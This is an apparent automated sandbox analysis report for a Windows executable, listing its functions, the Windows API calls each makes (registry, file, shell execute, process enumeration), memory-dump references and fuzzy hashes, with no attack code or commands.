APIs

Part of subcall function 0040154D: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587

RegDeleteValueW.KERNELBASE(00000000,00000000), ref: 004024AF
RegCloseKey.ADVAPI32(00000000), ref: 004024B8

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 28d58af51618036718c252708d6da1339e8b50d3138fddc83e0f4718e70968a2
Instruction ID: e1576bc29d89e2789c90d7360848647e5e88d3aa3db4fc6b5d334060f6266443
Opcode Fuzzy Hash: 28d58af51618036718c252708d6da1339e8b50d3138fddc83e0f4718e70968a2
Instruction Fuzzy Hash: FE01863250061197EB15EBA49A59B7F7274EB80758F21413FE402BB1E1C67C8D81865D

Function 0040139B Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7d139e0d7de234bcf6a700e513e47626535988416de2a1309b9d7b071a3250d9
Instruction ID: d821e5382ecf7e63f516690336e344d0ace40c90d4042eade43e4a0886427dd5
Opcode Fuzzy Hash: 7d139e0d7de234bcf6a700e513e47626535988416de2a1309b9d7b071a3250d9
Instruction Fuzzy Hash: 2801FF31A202209BEB155F35AC08B6B3698A784315F20427EF855F72F2D678CC829B8C

Function 004058FE Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000003,0040315B,C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 0a2f85832d22be582635bab1499ab015b7246acefa136c2a8fff2ea0c335f580
Instruction ID: 3557cad305de1e8d8744f7ed922a0974add56b4630c1d6058af0572804785a4b
Opcode Fuzzy Hash: 0a2f85832d22be582635bab1499ab015b7246acefa136c2a8fff2ea0c335f580
Instruction Fuzzy Hash: 0AD09E71654201EFEF099F20DE1AF6EBBA2EB84B01F11852CB692940E0DAB15819DB15

Function 004058DE Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,00406701,?,?,?), ref: 004058E2
SetFileAttributesW.KERNEL32(?,00000000), ref: 004058F5

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: 9bfeacdea6eb5f2932ef974784812b51c4f8f2d5e5736dd59436ec15d4266534
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 8DC01272404900AAC6001B34DF0881A7B22AB94331B258739B5BAE00F0CB3088A9AA18

Function 00401F9B Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(?,00000000,?,00000000,004D40B0,00000000), ref: 00401FEA

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 472f4eeaf3e5161a1656fb81187af857e571e343c78cb304711e9bc17c207397
Instruction ID: 63966a6383d29ffdfa22f329224652c183dd70f9b2d60f481563a5b1fdafd2c8
Opcode Fuzzy Hash: 472f4eeaf3e5161a1656fb81187af857e571e343c78cb304711e9bc17c207397
Instruction Fuzzy Hash: 6DF06232650224A6DB10BBB9DC86BAD37E89B44758F208537F601EA0E2D67CC8C18248

Function 0040154D Relevance: 1.5, APIs: 1, Instructions: 32
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000000,00000000,?,?), ref: 00401587

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5e993feb771b5cf26465967f746d5e6f11a2072fdff488fd80c6cb0f440dea5c
Instruction ID: 25f660db1a1e8629dce7ab52a77c94397c675d14e237935d7f32c5267cf96d12
Opcode Fuzzy Hash: 5e993feb771b5cf26465967f746d5e6f11a2072fdff488fd80c6cb0f440dea5c
Instruction Fuzzy Hash: E8F0377A250109BBD700DB59DD41FE637DCE744B94F148036FA09DB151C735E44187A9

Function 0040188D Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,?,?), ref: 004018A4

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 223388b599ff242e7ccadcd08180d40b3faf74b659585ba66a24a54107b5256e
Instruction ID: 00f5228fbcba69d7f7f389f47c449123412ef94834c0b690fd6e23632fde5db3
Opcode Fuzzy Hash: 223388b599ff242e7ccadcd08180d40b3faf74b659585ba66a24a54107b5256e
Instruction Fuzzy Hash: ABE04F32304255AAF340DBA4DD49B9E73A4DB40728F20423AEA15F60D1E3B49A84C769

Function 00402E9E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F3A,000000FF,00000004,00000000,00000000,00000000), ref: 00402EB5

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6eb761298bb8b99514d02d989ea50b9b43b036f115663e871731ccf59cb5bf7b
Instruction ID: bd695a607233752ff1959b473a7ca1503adc94cd5dff5db9087338bb7c64902f
Opcode Fuzzy Hash: 6eb761298bb8b99514d02d989ea50b9b43b036f115663e871731ccf59cb5bf7b
Instruction Fuzzy Hash: F0E08C322A0218BBCB219E91DE08AE73B5CEB047A2F008436B958E51D0D674D952DBF9

Function 00403360 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00405AE7: CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
Part of subcall function 00405AE7: CharNextW.USER32(?,?,?,00000000), ref: 00405B59
Part of subcall function 00405AE7: CharNextW.USER32(?,004E00C8,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
Part of subcall function 00405AE7: CharPrevW.USER32(?,?,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72

CreateDirectoryW.KERNELBASE(004E00C8,00000000,004E00C8,004E00C8,004E00C8,00000002,0040359B), ref: 00403381

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: c9f98378969a177fcb370052af8fd256873b8aecdbe0e59b9a239e0623e805da
Instruction ID: d79b23296e172e3f7541ee3cb439833c7f4a864136be478e135bd67e808ea9fb
Opcode Fuzzy Hash: c9f98378969a177fcb370052af8fd256873b8aecdbe0e59b9a239e0623e805da
Instruction Fuzzy Hash: 54D09E11547D7561C56236663E46FDF151C8F52359F114077F540B51C25A6C0A8289ED

Function 00402ED0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032EE,?,?,?,?,00000000,004035D7,?), ref: 00402EDE

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 052875b64ac29a69a56fe5fa30ce1250d27c90eff136e832dd86e8876edcd7ee
Instruction ID: 4946e7aaa73dbe9c50503acfc76fe66090dc5a246f76b590ec387925aa062f70
Opcode Fuzzy Hash: 052875b64ac29a69a56fe5fa30ce1250d27c90eff136e832dd86e8876edcd7ee
Instruction Fuzzy Hash: 4EB09231140300AADA215F009E09F057B21AB90700F108824B291281F086712020EA0D

Function 00401646 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 00401656

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8dc5173ed66c8cb9375c8a62a6b21d0958b4d16d400b23e9b38b04bf0691659c
Instruction ID: b7a5ace7ee108f6bfae9467569b9736203130378aa17b3a4f183cff96938e45a
Opcode Fuzzy Hash: 8dc5173ed66c8cb9375c8a62a6b21d0958b4d16d400b23e9b38b04bf0691659c
Instruction Fuzzy Hash: 42D02233704200CBE700F7B8AE8942E33A4E71232D3200C3BD803F20A0D639C8C1822D

Non-executed Functions

Function 00405C70 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 00405C83
lstrlenW.KERNEL32(?), ref: 00405C90
GetVersionExW.KERNEL32(?), ref: 00405CEE

Part of subcall function 00405ADA: CharUpperW.USER32(?,00405CC5,?), ref: 00405AE0

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00405D2D
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00405D4C
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00405D56
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00405D61
FreeLibrary.KERNEL32(00000000), ref: 00405D98
GlobalFree.KERNEL32(?), ref: 00405DA1

Strings

PSAPI.DLL, xrefs: 00405D28
Process32NextW, xrefs: 00405E8C
Module32NextW, xrefs: 00405EA2
Unknown, xrefs: 00405DC0
Module32FirstW, xrefs: 00405E97
EnumProcessModules, xrefs: 00405D4E
CreateToolhelp32Snapshot, xrefs: 00405E79
EnumProcesses, xrefs: 00405D46
Process32FirstW, xrefs: 00405E81
GetModuleBaseNameW, xrefs: 00405D58
Kernel32.DLL, xrefs: 00405E5F

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: bfd5aff29ee4f1ffb6214c97bb0594a6be1cab25f0f6d26799202fd0c5d98f81
